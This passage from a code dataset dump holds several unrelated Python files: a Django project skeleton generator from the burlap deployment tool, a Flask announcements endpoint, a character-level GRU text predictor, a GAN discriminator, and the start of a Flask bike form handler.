'django.template.loaders.filesystem.Loader',\n    'django.template.loaders.app_directories.Loader',\n)\nTEMPLATE_DIRS = (\n    '%s/src/{app_name}/templates' % PROJECT_DIR,\n)\n# https://docs.djangoproject.com/en/1.11/ref/settings/#templates\nTEMPLATES = [\n    {{\n        'BACKEND': 'django.template.backends.django.DjangoTemplates',\n        'DIRS': TEMPLATE_DIRS,\n        'APP_DIRS': True,\n        'OPTIONS': {{\n            #'loaders': TEMPLATE_LOADERS, # Unnecessary if we're using APP_DIRS.\n            'context_processors': [\n                'django.template.context_processors.debug',\n                'django.template.context_processors.request',\n                'django.contrib.auth.context_processors.auth',\n                'django.contrib.messages.context_processors.messages',\n            ],\n        }},\n    }},\n]\nADMIN_TITLE = '{app_name_title}'\nADMIN_TITLE_SIMPLE = '{app_name_simple}'\n'''.format(**bottom_args)\n        open(_settings_fn, 'w').write(_content[:_index]+_sites+('\\n'.join(_top))+_content[_index:]+_bottom)\n\n    print('Creating Django helper scripts...')\n    open('src/manage', 'w').write('''#!/bin/bash\n# Helper script for ensuring we use the Python binary in our local\n# virtual environment when calling management commands.\n# Otherwise, we'd have to always run `. ../.env/bin/activate`, which can be\n# annoying.\n# Be sure to run `fab pip.init` first in order to set up\n# the target role's Python virtual environment.\nDIR=`dirname $0`;\ncd $DIR;\n../.env/bin/python manage.py $@''')\n    open('src/runserver', 'w').write('''#!/bin/bash\n# Helper script for running the local dev server, ensuring\n# our virtual environment is used.\n#set -e\n#script_dir=`dirname $0`\n#cd $script_dir\nif [ -z \"$PORT\" ]; then\nexport PORT=8111\nfi\nif [ -z \"$ROLE\" ]; then\nexport ROLE=dev\nfi\n. ~/.bash_aliases\n./manage runserver localhost:$PORT''')\n    open('src/shell', 'w').write(r'''#!/bin/bash\n# Creates a local PIP-aware shell.\n#set -e\nif [ $_ == $0 ]\nthen\necho \"Please source this script. Do not execute.\"\nexit 1\nfi\n#script_dir=`dirname $0`\n#cd $script_dir\n. 
.env/bin/activate\nPS1=\"\\u@\\h:\\W(fab)\\$ \"''')\n\n    md('media')\n    md('static')\n\n    os.system('chmod +x src/shell')\n    os.system('chmod +x src/manage')\n    os.system('chmod +x src/runserver')\n\n    # Create the primary app for containing models/urls/views.\n    if not os.path.isdir('src/%s' % project_name):\n        os.system('cd src; ./manage startapp %s' % (project_name,))\n\n    os.system('cd src; ./manage syncdb')\n\nclass ProjectSatchel(ContainerSatchel):\n\n    name = 'project'\n\n    def set_defaults(self):\n        pass\n\n    def update_settings(self, d, role, path='roles/{role}/settings.yaml'):\n        \"\"\"\n        Writes a key/value pair to a settings file.\n        \"\"\"\n        try:\n            import ruamel.yaml\n            load_func = ruamel.yaml.round_trip_load\n            dump_func = ruamel.yaml.round_trip_dump\n        except ImportError:\n            print('Warning: ruamel.yaml not available, reverting to yaml package, possible loss of formatting may occur.')\n            import yaml\n            load_func = yaml.load\n            dump_func = yaml.dump\n        settings_fn = path.format(role=role)\n        data = load_func(open(settings_fn))\n        data.update(d)\n        settings_str = dump_func(data)\n        open(settings_fn, 'w').write(settings_str)\n\n    @task\n    def create_skeleton(self, project_name, roles='', components='', pip_requirements='', virtualenv_dir='.env', **kwargs):\n\n        assert project_name, 'Specify project name.'\n        site_name = project_name\n\n        app_name = project_name\n\n        default_roles = [_ for _ in roles.split(',') if _.strip()]\n        default_components = [_.strip().lower() for _ in components.split(',') if _.strip()]\n\n        print('Creating folders...')\n        md('roles/all')\n        for _role in default_roles:\n            md('roles/%s' % _role)\n        md('src')\n\n        print('Creating roles...')\n        open('roles/all/settings.yaml', 'w').write(\n            self.render_to_string(\n                'burlap/all_settings.yaml.template',\n                extra=dict(project_name=project_name, site_name=site_name, app_name=app_name)))\n        for _role in default_roles:\n            open('roles/%s/settings.yaml' % _role, 'w').write(\n                self.render_to_string(\n                    'burlap/role_settings.yaml.template',\n                    extra=dict(project_name=project_name, site_name=site_name, role=_role)))\n\n        default_packages = pip_requirements.split(',')\n        if default_packages:\n            open('roles/all/pip-requirements.txt', 'w').write('\\n'.join(default_packages))\n\n        print('Adding global apt-requirements.txt...')\n        open('roles/all/apt-requirements.txt', 'w').write('')\n\n        print('Adding fabfile...')\n        content = open(fabfile_template, 'r').read()\n        content = content.format(project_name=project_name)\n        open('fabfile.py', 'w').write(content.strip()+'\\n')\n\n        print('Initializing local development virtual environment...')\n        os.system('virtualenv --no-site-packages %s' % virtualenv_dir)\n        for package in default_packages:\n            os.system('. 
%s/bin/activate; pip install %s; deactivate' % (virtualenv_dir, package))\n\n # Install burlap dependencies.\n burlap_pip_requirements = os.path.join(os.path.dirname(burlap.__file__), 'fixtures/requirements.txt')\n print('burlap_pip_requirements:', burlap_pip_requirements)\n assert os.path.exists(burlap_pip_requirements), 'Missing requirements file: %s' % burlap_pip_requirements\n for package in open(burlap_pip_requirements, 'r').readlines():\n if not package.strip():\n continue\n cmd = '%s/bin/pip install %s' % (virtualenv_dir, package)\n print('cmd:', cmd)\n assert not os.system(cmd)\n\n print('Adding bash setup...')\n open('setup.bash', 'w').write(self.render_to_string('burlap/setup.bash.template'))\n\n print('Adding gitignore...')\n open('.gitignore', 'w').write(self.render_to_string('burlap/gitignore.template'))\n\n args = kwargs.copy()\n args['project_name'] = project_name\n args['roles'] = roles\n args['default_roles'] = default_roles\n args['components'] = components\n args['pip_requirements'] = pip_requirements\n args['virtualenv_dir'] = virtualenv_dir\n for component in default_components:\n print('Setting up component %s...' % component)\n # Get component-specific settings.\n component_kwargs = dict(args)\n for _k, _v in kwargs.items():\n _key = component+'_'\n if _k.startswith(_key):\n component_kwargs[_k[len(_key):]] = _v\n del component_kwargs[_k]\n print('component_kwargs:', component_kwargs)\n try:\n globals()['init_%s' % component](**component_kwargs)\n except KeyError:\n pass\n\n print('='*80)\n print()\n print('Skeleton created for project %s!' % (project_name.title(),))\n print()\n\n @task\n def add_roles(self, roles):\n for role in roles:\n _role = role.strip().lower()\n fn = 'roles/%s/settings.yaml' % _role\n if os.path.isfile(fn):\n continue\n fn_dir = os.path.split(fn)[0]\n if not os.path.isdir(fn_dir):\n os.makedirs(fn_dir)\n open(fn, 'w').write(\n self.render_to_string('burlap/role_settings.yaml.template', extra=dict(role=_role)))\n print('Added role %s!' % role)\n\n @task\n def create_satchel(self, name):\n name_simple = re.sub(r'[^a-z0-9]+', '', name.lower())\n content = self.render_to_string(\n 'burlap/satchel.py.template',\n extra=dict(\n name_camelcase=to_camelcase(name),\n name_simple=name_simple,\n ))\n if not os.path.isdir('satchels'):\n os.makedirs('satchels')\n os.system('touch satchels/__init__.py')\n satchel_fn = 'satchels/%s.py' % name_simple\n open(satchel_fn, 'w').write(content.strip()+'\\n')\n print('Wrote %s.' 
% satchel_fn)\n\nproject = ProjectSatchel()\n", "sub_path": "burlap/project.py", "file_name": "project.py", "file_ext": "py", "file_size_in_byte": 10640, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "burlap.__file__", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 21, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 24, "usage_type": "call"}, {"api_name": "os.system", "line_number": 33, "usage_type": "call"}, {"api_name": "os.system", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 147, "usage_type": "call"}, {"api_name": "os.system", "line_number": 148, "usage_type": "call"}, {"api_name": "os.system", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 153, "usage_type": "call"}, {"api_name": "os.system", "line_number": 155, "usage_type": "call"}, {"api_name": "burlap.ContainerSatchel", "line_number": 157, "usage_type": "name"}, {"api_name": "ruamel.yaml.yaml", "line_number": 170, "usage_type": "attribute"}, {"api_name": "ruamel.yaml", "line_number": 170, "usage_type": "name"}, {"api_name": "ruamel.yaml.yaml", "line_number": 171, "usage_type": "attribute"}, {"api_name": "ruamel.yaml", "line_number": 171, "usage_type": "name"}, {"api_name": "yaml.load", "line_number": 175, "usage_type": "attribute"}, {"api_name": "yaml.dump", "line_number": 176, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 224, "usage_type": "call"}, {"api_name": "os.system", "line_number": 226, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 229, "usage_type": "call"}, {"api_name": "burlap.__file__", "line_number": 229, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path", "line_number": 231, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 237, "usage_type": "call"}, {"api_name": "burlap.decorators.task", "line_number": 183, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 277, "usage_type": "call"}, {"api_name": "os.path", "line_number": 277, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 279, "usage_type": "call"}, {"api_name": "os.path", "line_number": 279, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 280, "usage_type": "call"}, {"api_name": "os.path", 
"line_number": 280, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 281, "usage_type": "call"}, {"api_name": "burlap.decorators.task", "line_number": 272, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 288, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 295, "usage_type": "call"}, {"api_name": "os.path", "line_number": 295, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 296, "usage_type": "call"}, {"api_name": "os.system", "line_number": 297, "usage_type": "call"}, {"api_name": "burlap.decorators.task", "line_number": 286, "usage_type": "name"}, {"api_name": "{'ruamel.yaml': 'ruamel.yaml', 'yaml': 'yaml'}", "line_number": 302, "usage_type": "call"}]} +{"seq_id": "208653415", "text": "from flask import Blueprint, jsonify\n\nfrom app.web_app.announcements.models import Announcement, db\n\nmobile = Blueprint('mobile_announcements', __name__, url_prefix='/mobile/announcements')\n\n\n@mobile.route('/get/')\ndef get_announcement(announcement_id):\n announcement = Announcement.query.get(announcement_id)\n\n if announcement:\n announcement.downloads += 1\n db.session.add(announcement)\n db.session.commit()\n return jsonify({\n \"error\": \"None\",\n \"announcement\": {\n \"subject\": announcement.title,\n \"content\": announcement.content,\n \"ref_number\": announcement.ref_number,\n \"date_posted\": announcement.date_posted\n },\n \"sender\": {\n \"name\": announcement.sender.first_name + announcement.sender.last_name,\n \"department\": announcement.sender.department.name\n }\n })\n else:\n return jsonify({\n \"error\": \"NotFound\"\n })\n", "sub_path": "app/mobile/announcements/routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 1044, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Blueprint", "line_number": 5, "usage_type": "call"}, {"api_name": "app.web_app.announcements.models.Announcement.query.get", "line_number": 10, "usage_type": "call"}, {"api_name": "app.web_app.announcements.models.Announcement.query", "line_number": 10, "usage_type": "attribute"}, {"api_name": "app.web_app.announcements.models.Announcement", "line_number": 10, "usage_type": "name"}, {"api_name": "app.web_app.announcements.models.db.session.add", "line_number": 14, "usage_type": "call"}, {"api_name": "app.web_app.announcements.models.db.session", "line_number": 14, "usage_type": "attribute"}, {"api_name": "app.web_app.announcements.models.db", "line_number": 14, "usage_type": "name"}, {"api_name": "app.web_app.announcements.models.db.session.commit", "line_number": 15, "usage_type": "call"}, {"api_name": "app.web_app.announcements.models.db.session", "line_number": 15, "usage_type": "attribute"}, {"api_name": "app.web_app.announcements.models.db", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "287930136", "text": "import os\nimport random\nimport time\nimport math\nimport wikipedia\nfrom google_trans_new import google_translator\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport numpy as np\n\nCURR_DIR = os.path.dirname(os.path.realpath(__file__))\nDATA_DIR = os.path.join(CURR_DIR, '../data')\nEMBEDDING_DIM = 300\nEMBEDDINGS_PATH = os.path.join(CURR_DIR, \"embeddings.txt\")\nHIDDEN_SIZE = 2048\nNUM_LAYERS = 2\nCHUNK_LEN = 400\nDEVICE = 
torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nBATCH_SIZE = 128\nTEST_DATA = test_data = [\n ('Happ', 'y'),\n ('Happy Ne', 'w'),\n ('Happy New Yea', 'r'),\n ('That’s one small ste', 'p'),\n ('That’s one sm', 'a'),\n ('That’', 's'),\n ('Th', 'a'),\n ('one giant leap for mankin', 'd'),\n ('one giant leap fo', 'r'),\n ('one giant lea', 'p'),\n ('one giant l', 'e'),\n ('one gia', 'n'),\n ('on', 'e'),\n ('Ruin h', 'a'),\n ('Ruin has co', 'm'),\n ('Ruin has come to o', 'u'),\n ('Ruin has come to our fam', 'i'),\n ('Ruin has come to our famil', 'y'),\n ('You rem', 'e'),\n ('You remember our vene', 'r'),\n ('You remember our venerabl', 'e'),\n ('You remember our venerable hou', 's'),\n ('You remember our venerable house, op', 'u'),\n ('You remember our venerable house, opulent and im', 'p'),\n ('You remember our venerable house, opulent and imperia', 'l'),\n ('G', 'a'),\n ('Gaz', 'i'),\n ('Gazin', 'g'),\n ('Gazing pro', 'u'),\n ('Gazing proudl', 'y'),\n ('Gazing proudly from its sto', 'i'),\n ('Gazing proudly from its stoic per', 'c'),\n ('Gazing proudly from its stoic perch ab', 'o'),\n ('Gazing proudly from its stoic perch abo', 'v'),\n ('Gazing proudly from its stoic perch above the moo', 'r'),\n ('Mons', 't'),\n ('Monst', 'r'),\n ('Monstrou', 's'),\n ('Monstrous si', 'z'),\n ('Monstrous size has no in', 't'),\n ('Monstrous size has no intrins', 'i'),\n ('Monstrous size has no intrinsic mer', 'i'),\n ('Monstrous size has no intrinsic meri', 't'),\n ('Monstrous size has no intrinsic merit, unl', 'e'),\n ('Monstrous size has no intrinsic merit, unless inor', 'd'),\n ('Monstrous size has no intrinsic merit, unless inordinat', 'e'),\n ('Monstrous size has no intrinsic merit, unless inordinate e', 'x'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsan', 'g'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguinatio', 'n'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguination be co', 'n'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguination be con', 's'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguination be consid', 'e'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguination be conside', 'r'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguination be consider', 'e'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguination be considere', 'd'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguination be considered a vir', 't'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguination be considered a virt', 'u'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguination be considered a virtu', 'e'),\n]\nrandom.seed(447)\n\ndef get_vocab():\n vocab = set()\n file_list = os.listdir(DATA_DIR)\n for i, file in enumerate(file_list):\n with open(os.path.join(DATA_DIR, file)) as f:\n text = f.read()\n f_vocab = set(text)\n currlen = len(vocab)\n vocab.update(f_vocab)\n # print(\"{}/{} Added {} characters to vocab from {}\".format(i+1, len(file_list), len(vocab) - currlen, file))\n voc_list = list(vocab)\n voc_list.insert(0, '\\u2400')\n voc_string = ''.join(voc_list)\n\n print(\"{} total characters in vocab\".format(len(vocab)))\n return voc_string\n\nwith open(os.path.join(CURR_DIR, 'vocab.txt'), 'r') as f:\n vocab = f.read()\nNUM_CHARACTERS = len(vocab)\n\ndef time_since(since):\n s = time.time() - since\n m = math.floor(s / 60)\n s -= m * 60\n return '%dm %ds' % (m, 
s)\n \ndef char_tensor(s: str):\n if torch.cuda.is_available():\n tensor = torch.zeros(len(s)).to(torch.int64).cuda('cuda')\n else:\n tensor = torch.zeros(len(s)).to(torch.int64)\n for c in range(len(s)):\n try:\n tensor[c] = vocab.index(s[c])\n except ValueError:\n tensor[c] = 0 # if not in vocab, use 0 as index. 0 indexes the null symbol in vocab\n return Variable(tensor)\n\nclass TrainData():\n def __init__(self, batch_size=BATCH_SIZE): \n self.batch_index = 0\n self.batch_size = batch_size\n data = []\n file_list = os.listdir(DATA_DIR)\n non_cuda_tensors = 0\n print(len(file_list), 'articles in the dataset')\n hundreth = len(file_list) // 100\n tenth = len(file_list) // 10\n for i, filename in enumerate(file_list):\n if (i+1) % tenth == 0:\n print('|', end='')\n elif (i+1) % hundreth == 0:\n print('-', end='')\n with open(os.path.join(DATA_DIR, filename), 'r') as f:\n for line in f:\n line = line.strip('\\n')\n if len(line) <= 1:\n continue\n elif len(line) > CHUNK_LEN:\n idx = 0\n while idx < len(line):\n if idx + CHUNK_LEN < len(line):\n chunk = line[idx:idx+CHUNK_LEN]\n else:\n chunk = line[idx:]\n tensor = char_tensor(chunk)\n if not tensor.is_cuda:\n non_cuda_tensors += 1\n data.append(tensor)\n idx += CHUNK_LEN\n else:\n tensor = char_tensor(line)\n if not tensor.is_cuda:\n non_cuda_tensors += 1\n data.append(tensor)\n random.shuffle(data)\n print(f'\\nNon-cuda tensors in dataset: {non_cuda_tensors}')\n print(f'Total tensors in dataset: {len(data)}')\n self.data = data\n def random_training_set(self):\n if self.batch_index + self.batch_size >= len(self.data):\n self.batch_index = 0\n return self.data[self.batch_index:]\n else:\n self.batch_index += self.batch_size\n return self.data[self.batch_index:self.batch_index + self.batch_size]\n\ndef get_tensor_embeddings(input_size, embedding_dim, vocab):\n embeddings = {}\n try:\n file = open(EMBEDDINGS_PATH, 'r')\n for line in file:\n raw = line.strip().split()\n #First value in the line is the character name the rest are float values\n embedValues = np.asarray(raw[1:], dtype=float)\n char = raw[0]\n embeddings[char] = embedValues\n except:\n pass\n \n if torch.cuda.is_available():\n tensor_embeddings = torch.normal(0,1,(input_size, embedding_dim)).cuda('cuda')\n else:\n tensor_embeddings = torch.normal(0,1,(input_size, embedding_dim))\n for i, char in enumerate(vocab):\n if char in embeddings:\n tensor_embeddings[i] = torch.Tensor(embeddings[char])\n return tensor_embeddings\n\nclass Model(nn.Module):\n def __init__(self, vocab=vocab, input_size=NUM_CHARACTERS, hidden_size=HIDDEN_SIZE, output_size=NUM_CHARACTERS, n_layers=NUM_LAYERS):\n super(Model, self).__init__()\n self.vocab = vocab\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.output_size = output_size\n self.n_layers = n_layers\n tensor_embeddings = get_tensor_embeddings(input_size, EMBEDDING_DIM, self.vocab)\n self.encoder = nn.Embedding.from_pretrained(tensor_embeddings, freeze=False)\n self.gru = nn.GRU(EMBEDDING_DIM, hidden_size, n_layers)\n self.decoder = nn.Linear(hidden_size, output_size)\n \n def forward(self, inputchar, hidden):\n inputchar = self.encoder(inputchar.view(1, -1))\n output, hidden = self.gru(inputchar.view(1, 1, -1), hidden)\n output = self.decoder(output.view(1, -1))\n return output, hidden\n\n def init_hidden(self):\n if torch.cuda.is_available():\n return Variable(torch.zeros(self.n_layers, 1, self.hidden_size).cuda('cuda'))\n else:\n return Variable(torch.zeros(self.n_layers, 1, self.hidden_size))\n\n def train_step(self, inp, 
criterion, optim,):\n self.zero_grad()\n loss = 0\n total_items = 0\n for i, line in enumerate(inp):\n if (i+1) % (BATCH_SIZE // 10) == 0:\n print('|', end='')\n elif (i+1) % (BATCH_SIZE // 100) == 0:\n print('-', end='')\n hidden = self.init_hidden()\n total_items += len(line) - 1\n for c in range(len(line) - 1):\n output, hidden = self(line[c], hidden)\n target = line[c + 1]\n # unsqueeze() is used to add dimension to the tensor\n loss += criterion(output, target.unsqueeze(dim=0))\n # Back propagation\n print(\"\\nUpdating weights\")\n loss.backward()\n optim.step()\n return loss.item() / total_items\n \n def predict(self, history='A'):\n self.eval()\n hidden = self.init_hidden()\n history_input = char_tensor(history)\n\n # Use priming string to \"build up\" hidden state\n for c in range(len(history) - 1):\n _, hidden = self(history_input[c], hidden)\n inp = history_input[-1]\n\n output, hidden = self(inp, hidden)\n # print(output, type(output))\n top_i = []\n for i in torch.argsort(output[0])[-3:]:\n top_i.append(i.item())\n \n # Add predicted character to string and use as next input\n predicted_chars = []\n for i in top_i:\n predicted_chars.append(self.vocab[i])\n self.train()\n return predicted_chars\n \n # test data is a tuple of strings. first string is history, next string is correct char\n def evaluate(self, test_data=test_data):\n total = len(test_data)\n correct = 0\n for history, next_char in test_data:\n preds = self.predict(history)\n if next_char in preds:\n correct += 1\n return correct / total\n\ndef run_train(model, train_data, work_dir):\n model.to(DEVICE)\n for param in model.parameters():\n if not param.is_cuda:\n print(\"Model not initialized as cuda\")\n break\n\n optim = torch.optim.Adam(model.parameters(), lr=0.0005)\n criterion = nn.CrossEntropyLoss()\n start = time.time()\n\n eps = 250\n with open(os.path.join(work_dir, 'train_log.txt'), 'w') as f:\n print(\"Training model\")\n for epoch in range(1, eps + 1):\n print(f\"Epoch {epoch}\")\n inp = train_data.random_training_set()\n loss = model.train_step(inp, criterion, optim)\n accuracy = (model.evaluate() * 100)\n epoch_summary = '[%s (%d %d%%) %.4f], Accuracy: %.3f%%' % (time_since(start), epoch, epoch / eps * 100, loss, accuracy)\n print(epoch_summary)\n f.write(epoch_summary)\n f.write('\\n')\n \n with open('model.checkpoint.pt', 'wb') as f:\n torch.save(model, f)\n\n for history, next_char in test_data:\n preds = model.predict(history)\n print(next_char, preds, history)", "sub_path": "src/monofile.py", "file_name": "monofile.py", "file_ext": "py", "file_size_in_byte": 10734, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 19, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 81, "usage_type": "call"}, {"api_name": "os.listdir", 
"line_number": 85, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 105, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 111, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 112, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 114, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 120, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 184, "usage_type": "attribute"}, {"api_name": "torch.normal", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.normal", "line_number": 187, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 193, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 193, "usage_type": "name"}, {"api_name": "torch.nn.Embedding.from_pretrained", "line_number": 202, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 202, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 202, "usage_type": "name"}, {"api_name": "torch.nn.GRU", "line_number": 203, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 203, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 204, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 204, "usage_type": "name"}, {"api_name": "torch.cuda.is_available", "line_number": 213, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 213, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 214, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 214, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 216, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 216, "usage_type": "call"}, {"api_name": "torch.argsort", "line_number": 253, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 280, "usage_type": "attribute"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 281, "usage_type": "name"}, {"api_name": "time.time", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 285, "usage_type": "call"}, {"api_name": "os.path", "line_number": 285, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 298, "usage_type": "call"}]} +{"seq_id": 
"113815081", "text": "import torch\nimport numpy as np\nclass MyDiscriminator(torch.nn.Module):\n def __init__(self, img_shape):\n super(MyDiscriminator, self).__init__()\n self.hidden_dim = 128\n #int(np.prod(img_shape))\n self.model = torch.nn.Sequential( \n torch.nn.Conv2d(3, self.hidden_dim, 5, stride=2, padding=2), \n torch.nn.LeakyReLU(inplace=True),\n torch.nn.Conv2d(self.hidden_dim, self.hidden_dim * 2, 5, stride=2, padding=2),\n torch.nn.LeakyReLU(True),\n torch.nn.BatchNorm2d(self.hidden_dim * 2, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True),\n torch.nn.Conv2d(2 * self.hidden_dim, 4 * self.hidden_dim, 5, stride=2, padding=2),\n torch.nn.LeakyReLU(True),\n )\n self.linear = torch.nn.Linear(4 * self.hidden_dim * 8 * 8, 1)\n \n def forward(self, img):\n #print(\"dis\")\n if(img.shape[1] != 3):\n img = img.transpose(3,2).transpose(2,1)\n out = self.model(img)\n #print(out.shape) \n out = out.view(img.shape[0], -1)\n #print(img.shape[0])\n #print(out.shape)\n out = self.linear(out)\n #print(out.shape) \n return out.squeeze(-1) ", "sub_path": "hw3/Discriminator.py", "file_name": "Discriminator.py", "file_ext": "py", "file_size_in_byte": 1249, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn", "line_number": 3, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "attribute"}]} +{"seq_id": "645150938", "text": "from flask import Flask, render_template , request\r\nimport mlab\r\nfrom models.superbike import Bike\r\n\r\nmlab.connect()\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/add_bike\", methods = [\"GET\",\"POST\"])\r\ndef add_bike():\r\n if request.method == \"GET\":\r\n return render_template(\"add_bike.html\")\r\n if request.method == \"POST\":\r\n form = request.form \r\n bikename = form[\"bikename\"]\r\n hangxe = form[\"hangxe\"]\r\n image = form[\"image\"]\r\n dongco = 